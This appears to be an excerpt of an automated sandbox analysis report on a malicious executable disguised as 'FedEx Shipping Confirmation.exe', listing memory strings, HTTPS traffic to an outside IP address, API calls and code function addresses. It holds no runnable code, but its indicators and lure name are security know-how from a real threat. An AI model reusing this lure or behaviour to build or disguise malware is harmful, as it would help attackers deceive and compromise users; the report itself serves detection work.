Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000033045000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FDD000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/?ms.officeurl=setup
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/?ms.officeurl=setupMicrosoft
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000033045000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FDD000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/EnterPin?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/EnterPin?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Microsoft
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000033045000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FDD000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/Home/EligibileActModern?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/Home/EligibileActModern?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Microsoft
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000033045000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8.
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Continue
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Continue/
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/SignIn?ctid=34c190b7-c610-402a-b0d1-920cecdfcf12&redirectUri=https%3A%2F%2F
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/SignIn?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8&redirectUri=https%3A%2F%2F
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000033045000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/SignIn?ru=https%3A%2F%2Fsetup.office.com%2F%3Fms.officeurl%3Dsetup
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/SignIn?ru=https%3A%2F%2Fsetup.office.com%2F%3Fms.officeurl%3Dsetup2V
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/SignIn?ru=https%3A%2F%2Fsetup.office.com%2F%3Fms.officeurl%3DsetupSign
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000033045000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/home/ProvisionLoading?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/home/ProvisionLoading?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8-_
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/home/ProvisionLoading?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8Microsoft
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FE7000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033F95000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stubdownloader.services.mozilla.com/?attribution_code=c291cmNlPXd3dy5nb29nbGUuY29tJm1lZGl1bT
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000341F7000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033F36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000341F7000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033F36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FE7000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033F95000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FE7000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033F95000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exeQ
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/7
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/AutoIt
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FE7000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033F95000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/https://www.autoitscript.com/site/autoit/download
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.eicar.org/
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/:
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000034009000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FD9000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/Download
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FE7000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033F95000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.eicar.org/https://eicar.org/https://www.eicar.org/download-anti-malware-testfile/https:/
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000341F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/favicon.ico
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033F36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=at
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=autoit
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=eicar
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FDD000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-release
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FE7000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033F95000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-releasehttps://www.mozilla.org/en-GB/fire
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.00000000331BE000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000033045000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8124418552.0000000032FDD000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/setup
Source: FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.00000000342B8000.00000004.00000800.00020000.00000000.sdmp, FedEx Shipping Confirmation.exe, 00000003.00000002.8125970558.0000000033FBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/setupMicrosoft

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49806 version: TLS 1.2

Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe

Code function: 1_2_0040352F EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

1_2_0040352F

Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe

File created: C:\Windows\resources\0409

Jump to behavior

Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 1_2_6ED21BFF	1_2_6ED21BFF
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_0011C2B0	3_2_0011C2B0
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_001152FD	3_2_001152FD
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_0011C584	3_2_0011C584
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_0011E790	3_2_0011E790
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_0011C851	3_2_0011C851
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_00116920	3_2_00116920
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_0011CB25	3_2_0011CB25
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_0011BB48	3_2_0011BB48
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_0011CDF4	3_2_0011CDF4
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_00116F48	3_2_00116F48
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_0011BFE0	3_2_0011BFE0
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_0011F039	3_2_0011F039
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_0011F048	3_2_0011F048
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_0011E781	3_2_0011E781
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_001137E5	3_2_001137E5
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_00112999	3_2_00112999
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_001139B1	3_2_001139B1
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_0011FC81	3_2_0011FC81
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_0011BD10	3_2_0011BD10
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_00113DCE	3_2_00113DCE
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_358E1798	3_2_358E1798
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_358E1E80	3_2_358E1E80
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_358E46B0	3_2_358E46B0
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_358E10B8	3_2_358E10B8
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_358E0040	3_2_358E0040
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_358E8BD0	3_2_358E8BD0
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_358EC358	3_2_358EC358
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_358EE580	3_2_358EE580
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_358EE571	3_2_358EE571
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_358EFC58	3_2_358EFC58
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_358EFC68	3_2_358EFC68
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_358E1788	3_2_358E1788
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_358EEF51	3_2_358EEF51
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_358EEF60	3_2_358EEF60
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_358E46A0	3_2_358E46A0
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_358E1E70	3_2_358E1E70
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_358E10A9	3_2_358E10A9
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_358EF800	3_2_358EF800
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_358E001E	3_2_358E001E
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_358EF810	3_2_358EF810
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_358EF3A9	3_2_358EF3A9
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_358EF3B8	3_2_358EF3B8
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_358E92A0	3_2_358E92A0
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_358E8228	3_2_358E8228
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_35B18BA0	3_2_35B18BA0
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_35B1A290	3_2_35B1A290
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_35B12BB0	3_2_35B12BB0
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_35B145B0	3_2_35B145B0
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_35B1E8B7	3_2_35B1E8B7
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_35B152B9	3_2_35B152B9
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_35B138B8	3_2_35B138B8
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_35B1BFB8	3_2_35B1BFB8
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_35B111A0	3_2_35B111A0
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_35B12BA0	3_2_35B12BA0
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_35B11EA8	3_2_35B11EA8
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_35B1DFA8	3_2_35B1DFA8
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_35B138A8	3_2_35B138A8
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_35B1BFA8	3_2_35B1BFA8
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_35B11191	3_2_35B11191
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_35B18B91	3_2_35B18B91
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_35B17190	3_2_35B17190
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_35B10498	3_2_35B10498
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_35B17E98	3_2_35B17E98
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_35B1B698	3_2_35B1B698
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_35B11E98	3_2_35B11E98
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_35B1DF98	3_2_35B1DF98
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_35B17180	3_2_35B17180
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_35B1A280	3_2_35B1A280
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_35B10489	3_2_35B10489
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_35B17E89	3_2_35B17E89
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_35B1D688	3_2_35B1D688
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_35B19588	3_2_35B19588
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_35B1B68E	3_2_35B1B68E
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_35B108F0	3_2_35B108F0
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_35B182F0	3_2_35B182F0
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_35B122F0	3_2_35B122F0
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_35B1FAF9	3_2_35B1FAF9
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_35B1D1F8	3_2_35B1D1F8
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_35B115F8	3_2_35B115F8
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_35B12FF8	3_2_35B12FF8
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_35B1B1FA	3_2_35B1B1FA
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_35B108E1	3_2_35B108E1
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_35B199E0	3_2_35B199E0
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_35B182E0	3_2_35B182E0
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_35B1D1E9	3_2_35B1D1E9
Source: C:\Users\user\Desktop\FedEx Shipping Confirmation.exe	Code function: 3_2_35B175E8	3_2_35B175E8
